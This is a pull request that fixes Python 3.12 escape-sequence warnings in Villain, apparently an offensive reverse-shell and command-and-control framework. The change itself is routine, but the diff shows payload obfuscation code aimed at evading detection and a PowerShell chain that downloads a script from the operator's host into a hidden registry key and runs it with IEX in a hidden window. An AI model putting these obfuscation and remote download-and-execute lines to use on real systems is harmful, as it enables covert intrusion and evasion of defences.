### PR TITLE
Fix Python3.12 invalid escape warning message

### DIFF
--- a/Core/villain_core.py
+++ b/Core/villain_core.py
@@ -295,7 +295,7 @@ class Obfuscator:
 			if path == 1:
 				return char
 
-			return '\w' if path == 2 else f'({char}|\\?)'
+			return '\\w' if path == 2 else f'({char}|\\?)'
 
 
 
@@ -304,7 +304,7 @@ class Obfuscator:
 			if path == 1:
 				return char
 
-			return '\d' if path == 2 else f'({char}|\\?)'
+			return '\\d' if path == 2 else f'({char}|\\?)'
 
 
 
@@ -316,7 +316,7 @@ class Obfuscator:
 			if path == 1:
 				return char
 
-			return '\W' if path == 2 else f'({char}|\\?)'
+			return '\\W' if path == 2 else f'({char}|\\?)'
 
 		else:
 			return None
@@ -331,7 +331,7 @@ class Obfuscator:
 	def string_to_regex(self, string):
 
 		# First check if string is actually a regex
-		if re.match( "^\[.*\}$", string):
+		if re.match( "^\\[.*\\}$", string):
 			return string
 
 		else:
@@ -451,7 +451,7 @@ class Obfuscator:
 	def mask_payload(self, payload):
 
 		# Obfuscate variable name definitions
-		variables = re.findall("\$[A-Za-z0-9_]*={1}", payload)
+		variables = re.findall("\\$[A-Za-z0-9_]*={1}", payload)
 
 		if variables:
 
@@ -505,7 +505,7 @@ class Obfuscator:
 
 
 		# Randomize the case of each char in parameter names
-		ps_parameters = re.findall("\s-[A-Za-z]*", payload)
+		ps_parameters = re.findall("\\s-[A-Za-z]*", payload)
 
 		if ps_parameters:
 			for param in ps_parameters:
@@ -2786,7 +2786,7 @@ class TCP_Sock_Multi_Handler:
 		if hostname[-1] == ".":
 			hostname = hostname[:-1]
 
-		allowed = re.compile("(?!-)[A-Z\d-]{1,63}(?<!-)$", re.IGNORECASE)
+		allowed = re.compile("(?!-)[A-Z\\d-]{1,63}(?<!-)$", re.IGNORECASE)
 		return all(allowed.match(x) for x in hostname.split("."))
 
 
@@ -2937,7 +2937,7 @@ class TCP_Sock_Multi_Handler:
 	def search_cmd_for_signature(self, cmd):
 
 		try:
-			sibling_server_id = re.findall("[\S]{1,2}echo '{[a-zA-Z0-9]{32}}'", cmd)[-1]
+			sibling_server_id = re.findall("[\\S]{1,2}echo '{[a-zA-Z0-9]{32}}'", cmd)[-1]
 			sibling_server_id = sibling_server_id.split('echo ')[1].strip('{}\'')
 
 		except:
@@ -3056,7 +3056,7 @@ class Exec_Utils:
 		if shell_type:
 
 			if shell_type == 'powershell.exe':
-				return 'Start-Process $PSHOME\powershell.exe -ArgumentList {' + execution_object + '} -WindowStyle Hidden'
+				return 'Start-Process $PSHOME\\powershell.exe -ArgumentList {' + execution_object + '} -WindowStyle Hidden'
 
 			elif shell_type == 'cmd.exe':
 				return 'start "" cmd /k "' + execution_object + '"'

--- a/Villain.py
+++ b/Villain.py
@@ -692,7 +692,7 @@ class Completer(object):
 									
 			word_frag = line_buffer_list[-1].lower()
 
-			if re.search('payload=[\w\/\\\]{0,}', word_frag):
+			if re.search('payload=[\\w\\/\\\\]{0,}', word_frag):
 				
 				tmp = word_frag.split('=')
 
@@ -962,8 +962,8 @@ def main():
 
 
 				# Handle single/double quoted arguments
-				quoted_args_single = re.findall("'{1}[\s\S]*'{1}", user_input)
-				quoted_args_double = re.findall('"{1}[\s\S]*"{1}', user_input)
+				quoted_args_single = re.findall("'{1}[\\s\\S]*'{1}", user_input)
+				quoted_args_double = re.findall('"{1}[\\s\\S]*"{1}', user_input)
 				quoted_args = quoted_args_single + quoted_args_double
 				
 				if len(quoted_args):
@@ -1429,9 +1429,9 @@ def main():
 						rand_key = get_random_str(5)
 						value_name = get_random_str(5)
 						script_src = f'http://{lhost}:{File_Smuggler_Settings.bind_port}/{ticket}'
-						reg_polution = f'New-Item -Path "HKCU:\SOFTWARE\{rand_key}" -Force | Out-Null;New-ItemProperty -Path "HKCU:\SOFTWARE\{rand_key}" -Name "{value_name}" -Value $(IRM -Uri {script_src} -UseBasicParsing) -PropertyType String | Out-Null;'
-						exec_script = f'(Get-ItemPropertyValue -Path "HKCU:\SOFTWARE\{rand_key}\" -Name "{value_name}" | IEX) | Out-Null'
-						remove_src = f'Remove-Item -Path "HKCU:\Software\{rand_key}" -Recurse'
+						reg_polution = f'New-Item -Path "HKCU:\\SOFTWARE\\{rand_key}" -Force | Out-Null;New-ItemProperty -Path "HKCU:\\SOFTWARE\\{rand_key}" -Name "{value_name}" -Value $(IRM -Uri {script_src} -UseBasicParsing) -PropertyType String | Out-Null;'
+						exec_script = f'(Get-ItemPropertyValue -Path "HKCU:\\SOFTWARE\\{rand_key}\" -Name "{value_name}" | IEX) | Out-Null'
+						remove_src = f'Remove-Item -Path "HKCU:\\Software\\{rand_key}" -Recurse'
 						new_proc = Exec_Utils.new_process_wrapper(f"{exec_script}; {func_name}; {remove_src}", session_id)
 						execution_object = Exec_Utils.ps_try_catch_wrapper(f'{reg_polution};{exec_script};({new_proc})', error_action = remove_src)
 						


### PR DESCRIPTION
Fix invalid escape warning message from Python 3.12.

Please just further check if all the functionalities coming from the implemented regex and PowerShell work as intended.